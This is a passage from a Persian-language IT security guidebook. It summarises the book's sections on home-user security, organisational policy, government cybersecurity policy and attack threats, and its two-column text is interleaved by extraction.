‫ﺑﺨﺶ ﺩﻭﻡ ﻛﺘﺎﺏ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻛﻪ ﺍﺯ ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪﺍﻱ ﻭ‬ ‫ﻭ ﻣﺤﺼﻮﻻﺕ ﺷﺮﻛﺘﻬﺎﻱ ﺭﻗﻴﺐ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ﻭ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻣﺘﻌﺪﺩ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻳﺎ ﻣﺤﻞ ﻛـﺎﺭ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻭﺳﻴﻊ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻧﺪﺍﺭﻧـﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ‬
‫ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﻟﺒﺘﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻜﻲ ﻛﻪ ﻗـﺎﺩﺭ ﺑـﻪ ﺗﻌﻴـﻴﻦ‬ ‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺁﻧﺴﻮﻱ ﻣﺮﺯﻫﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ ﺑـﺮﺍﻱ ﻫـﺮ‬
‫ﺩﻗﻴــﻖ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺭﺍﻫﺒــﺮﻱ ﺁﻥ‬ ‫ﺳﻴﺴﺘﻢ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺴﻴﺎﺭ ﺟـﺬﺍﺏ ﺍﺳـﺖ‪ ،‬ﻫﻤﻜـﺎﺭﻱ ﮔـﺴﺘﺮﺩﻩﺍﻱ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻧﻲ ﻧﻴﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻔﻴﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ‪ .‬ﺍﻳـﻦ‬ ‫ﺑﺮﺍﻱ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﻣﺪﻝ ﻳﻚ ﻧﻈﺎﻡ ﺷﺒﻜﻪﺍﻱ ﻛﺎﺭﺁﻣﺪ ﻭ ﺟﻬﺎﻧﻲ ﻻﺯﻡ‬
‫ﺑﺨﺶ ﺑﻪ ﺗﺸﺮﻳﺢ ﺍﺻﻮﻝ ﺍﺳﺎﺳﻲ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺮﺩﺍﺧﺘﻪ ﻭ‬ ‫ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻓﻨﻮﻧﻲ ﻛﻪ ﻣﻮﺟﺐ ﻛﺎﻫﺶ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻣـﻲﺷـﻮﻧﺪ‬
‫ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﻣـﺬﻛﻮﺭ ﺩﺭ‬ ‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﻛﺘﺎﺏ‪:‬‬
‫ﺑﺨﺶ ﺩﻭﻡ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬ ‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺿﺮﻭﺭﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ؛ ﺗﺄﺛﻴﺮ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛‬ ‫•‬ ‫ﻭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺗﻮﺳﻌﻪ‬

‫‪7‬‬ ‫‪Viruses‬‬
‫‪8‬‬ ‫‪Worms‬‬
‫‪9‬‬ ‫‪Trojans‬‬
‫‪10‬‬ ‫)‪Malware (Malicious Software‬‬
‫‪11‬‬ ‫‪Online‬‬
‫‪٢١‬‬ ‫ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ‬

‫ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮ ﺍﻣﻨﻴﺘـﻲ ﻭ ﺗﺤﻠﻴـﻞ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻳـﻚ ﺷـﺮﻛﺖ‬ ‫•‬ ‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ‪ ،‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‪ ١٢‬ﺍﺯ ﻃﺮﻳـﻖ‬ ‫•‬
‫ﻧﻮﻋﻲ؛‬ ‫ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ‪ ١٣‬ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪١٤‬؛‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﻳﻪ ﻫﺎﻱ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﻭ‬ ‫•‬ ‫ﺍﻧﻮﺍﻉ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻭ ﭼﮕﻮﻧﮕﻲ ﮔﺴﺘﺮﺵ ﺁﻧﻬﺎ؛‬ ‫•‬
‫ﻃﺮﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ؛‬ ‫ﻣﺒﻨﺎﻱ ﻛﺎﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺩﻟﻴـﻞ ﺍﻳﻨﻜـﻪ‬ ‫•‬
‫ﻧﻘﺶ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‪ ،‬ﺷـﺒﻜﻪﻫـﺎ ﻭ‬ ‫•‬ ‫ﺍﺑﺰﺍﺭﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ؛‬
‫ﺩﺍﺩﻩﻫﺎ؛‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺷﺎﻣﻞ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ‪ ،‬ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ‬ ‫•‬
‫ﺍﻣﻨﻴﺖ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﺎﻣﻞ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ‪ ،‬ﻓﺮﺁﻳﻨﺪ ﺍﺳﺘﺨﺪﺍﻡ‬ ‫•‬ ‫ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪١٥‬؛‬
‫ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺍﻣﻨﻴﺘﻲ ﺧﺎﺭﺟﻲ؛‬ ‫ﻣﻔﺎﻫﻴﻢ ﭘﻴﺸﺮﻓﺘﻪﺗﺮﻱ ﭼﻮﻥ ﺳﺎﺧﺘﺎﺭ ﺷﺒﻜﻪﻫـﺎﻱ ‪TCP/IP‬‬ ‫•‬
‫‪١٦‬‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﮔﺰﺍﺭﺵ ﻭﻗﺎﻳﻊ ﻭ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ؛‬ ‫•‬ ‫ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻼﻗﻪﻣﻨﺪ‪.‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎ؛ ﻭ‬ ‫•‬ ‫ﺑﺨﺶ ﺩﻭﻡ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺯ‬
‫ﻟﺤﺎﻅ ﻓﻨﻲ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳﻦ ﺑﺨـﺶ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ‬
‫ﺭﺍﻫﻨﻤﺎﻳﻴﻬــﺎﻱ ﺿــﻤﻴﻤﻪ ﻭ ﻋــﻮﺍﻣﻠﻲ ﻛــﻪ ﺑــﻪ ﻃﺮﺍﺣــﻲ ﻭ‬ ‫•‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻭ ﺑﺨﺶ ﺳﻮﻡ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺳـﺎﺯﻣﺎﻧﻲ ﺑـﻪ ﻣـﺴﺌﻠﻪ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ ﻣﻨﺎﺳﺐ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻣﻲﻧﮕﺮﺩ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺨﺶ ﺳﻮﻡ ﺑـﺮ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﻣـﺴﺘﻘﻴﻢ ﺑـﺎ‬
‫ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ‪ ،‬ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻭ ﺩﻭﻟﺘـﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺷـﺒﻜﻪﺍﻱ ﺩﺭ‬ ‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ ﻣﺮﻭﺭﻱ ﻛﻠﻲ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﻣﺒﺎﺣﺚ ﻣﺘﺨﺼـﺼﻴﻦ ﻭ‬ ‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ ﺩﺭﺑـﺎﺭﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺑﺨﺶ ﺳﻮﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺑﻌﺎﺩ ﺳﻴﺎﺳﺖ ﻭ ﺭﺍﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﻧﮕﺎﻩ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ .‬ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﻣﺒﺎﺣﺚ ﻋﻤﻴﻖﺗﺮﻱ ﺭﺍﺟﻊ ﺑـﻪ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ‪ .‬ﺍﺗﺨﺎﺫ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺐ ﻭ‬
‫ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﻠﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻄﺮﺡ ﻣﻲﻛﻨﺪ ﻭ ﺍﻳﻦ‬
‫ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺁﻧﻬﺎ ﺧﻄﺮ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻧﺎﮔﻬـﺎﻧﻲ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ‬
‫ﻣﺴﺎﺋﻞ ﺭﺍ ﺩﺭ ﻗﺎﻟﺐ ﺟﻬﺎﻧﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪ ،‬ﻭﺭﻭﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻠﺘﺮ‬
‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬ ‫ﻣﻲﻛﻨـﺪ ﻭ ﺍﺑـﺰﺍﺭ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﺣﻤـﻼﺕ ﻭ ﺍﺻـﻼﺡ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬ ‫ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ‪ .‬ﺑـﺮﺍﻱ ﺣﻔـﻆ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﻣﺤﺮﻣﺎﻧــﻪ ﻭ ﻛﻤــﻚ ﺑــﻪ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺑﺮﻧﺎﻣــﻪﻫــﺎ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﻋﻨﺎﻭﻳﻦ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻛـﻪ‬ ‫ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﺍﻧﺘﻘﺎﻝ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ‪ ،‬ﺑﺎﻳﺪ ﺗﻠﻔﻴﻘـﻲ ﺍﺯ‬
‫ﻓﻬﻢ ﺁﻧﻬﺎ ﺩﺭ ﺳﻄﻮﺡ ﺩﻭﻟﺘﻲ ﻻﺯﻡ ﺍﺳﺖ‪ .‬ﻳﻚ ﺩﻭﻟـﺖ ﻋـﻼﻭﻩ ﺑـﺮ‬ ‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺑﺨـﺶ ﺍﺟـﺰﺍﻱ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ ﺧـﻮﺩ‪ ،‬ﺑﺎﻳـﺪ ﻣﺘﻌﻬـﺪ ﺑﺎﺷـﺪ ﻛـﻪ‬ ‫ﻣﺨﺘﻠﻒ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﺆﺛﺮ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﻣﺠﻤﻮﻋــﻪ ﺳﻴﺎﺳــﺘﻬﺎﻳﻲ ﺭﺍ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺧﺘﻦ ﺍﻃﻼﻋــﺎﺕ‬ ‫ﻣﺎﻧﻨﺪ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ‪ ،‬ﺩﻭﻟﺘﻬـﺎ‪ ،‬ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻲ ﻣﻠﻲ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻧﻘﺶ ﻣﻬﻤـﻲ ﺩﺭ‬ ‫ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﺩ‪ ،‬ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺗﻨﺎﻗﻀﻲ ﻧﻴﺰ ﻭﺟﻮﺩ‬
‫ﺑﺨﺶ ﺳﻮﻡ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻗﻴﻖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ‬
‫ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺖ ﻣﻠﻲ ﺑﺎﻳﺪ ﻗـﺎﺩﺭ ﺑـﻪ‬
‫ﻣﻲﺩﻫﺪ‪:‬‬
‫ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻗﻮﺍﻧﻴﻦ ﺿﻌﻴﻒ ﺩﻭﻟﺘـﻲ ﺑـﻴﺶ ﺍﺯ‬
‫• ﺭﻭﺵ ﻫﺸﺖ ﺭﻛﻨﻲ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ‬
‫ﺁﻧﻜﻪ ﺳﻮﺩﻱ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺿـﺮﺭ ﺑـﻪ ﺑـﺎﺭ ﺧﻮﺍﻫﻨـﺪ ﺁﻭﺭﺩ‪.‬‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺭﺯﺷﻤﻨﺪ ﻫﺴﺘﻨﺪ؛‬
‫ﻓﻨﺎﻭﺭﻱ ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺪﻳـﺪ‬
‫ﺑﻪ ﺩﻟﻴﻞ ﻫﻤﻴﻦ ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ‪ .‬ﺩﺭ ﭼﻨـﻴﻦ ﻭﺿـﻌﻴﺘﻲ ﺍﺯ‬
‫ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘﻲ ﺑﺮﺍﻱ ﺑﻪ ﺩﺍﻡ ﺍﻧﺪﺍﺧﺘﻦ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﻭ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬
‫‪12‬‬ ‫‪Authentication‬‬
‫‪13‬‬ ‫‪Usernames‬‬
‫‪14‬‬ ‫‪Passwords‬‬
‫‪16‬‬ ‫‪Disaster Recovery‬‬ ‫‪15‬‬ ‫‪Remote Access Tools‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٢‬‬

‫ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ ﺍﻣﻨﻴـﺖ ﻛـﺎﺭﺑﺮﺍﻥ‬ ‫ﮔﺴﺘﺮﺵ ﺷﻴﻮﻩ ﻫﺎﻱ ﻧﻮﻳﻦ ﺧﻼﻓﻜﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ‬
‫ﺧﺎﻧﮕﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﭘﻴـﺎﺩﻩ ﺳـﺎﺯﻱ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬ ‫ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﺗــﻮﺍﺯﻧﻲ ﻣﻨﺎﺳــﺐ ﻣﻴــﺎﻥ ﻣﻌﻴﺎﺭﻫــﺎﻱ ﺗﻘﻨﻴﻨــﻲ ﻭ‬
‫ﻛﻼﻥ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻧـﺪ‪ .‬ﺑﺨـﺶ ﭘـﻨﺠﻢ ﺑـﻪ ﺗﻔـﺼﻴﻞ ﺑـﻪ ﺑﺮﺭﺳـﻲ‬ ‫ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺍﻫﻤﻴﺖ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﺩ‪ .‬ﻭﺍﺿﺢ ﺍﺳـﺖ ﻛـﻪ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻭﻳﮋﺓ ﺍﻣﻨﻴﺘﻲ ﻣﻲ ﭘﺮﺩﺍﺯﺩ ﻛﻪ ﺷﺎﻣﻞ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠـﻒ‬ ‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ ﻭ ﻓﻨـﻲ‬
‫ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﺭﻭﺷـﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ ﺗﺮﺍﻓﻴـﻚ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺩﻭﻟﺘﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﻣﻬﻢ‪ ،‬ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ‪ ١٧‬ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﻳـﻦ‬ ‫ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﺩﺭ ﻣﺴﺎﺋﻞ ﻓﻨﻲ ﮔﺎﻣﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ‬
‫ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﻭ ﺭﻭﺵ ﻣﻨﺎﺳﺐ ﻛﺎﺭ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺯﻣـﺎﻥ‬ ‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺩﺍﺭﻧﺪ‪.‬‬
‫ﺑﺤﺮﺍﻥ ﻣﻲﺑﺎﺷﺪ‪.‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺣﺎﻭﻱ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ ﺣﺎﻭﻱ ﻣﻄﺎﻟﺐ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬ ‫• ﺷﺒﻜﺔ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺩﻳﮕﺮ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﻪ ﻣﺘﻌﻠﻖ ﺑـﻪ‬
‫• ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ‬ ‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻩ ﺍﻣﺎ ﻧﻈﺎﺭﺕ ﺑﺮ ﺁﻧﻬﺎ ﺑـﺎ ﺩﻭﻟـﺖ ﺍﺳـﺖ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺳﻴﺴﺘﻢ؛‬ ‫)ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﻭﺍﺑﺴﺘﮕﻲ ﻣﺘﻘﺎﺑﻞ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ(؛‬
‫ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺨﺘﻠــﻒ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺍﺯ ﺳــﻮﻱ‬ ‫•‬ ‫ﻧﻘﺶ ﻛﻠﻲ ﺩﻭﻟﺖ ﻭ ﻭﻇﺎﻳﻒ ﺁﻥ ﺩﺭ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‬ ‫•‬
‫ﻋﻮﺍﻣﻞ ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﺧﺮﺍﺑﻜـﺎﺭﻱ ﻭ ﺩﺯﺩﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬ ‫ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ‪ ،‬ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ؛‬
‫ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ؛‬ ‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ‬ ‫•‬
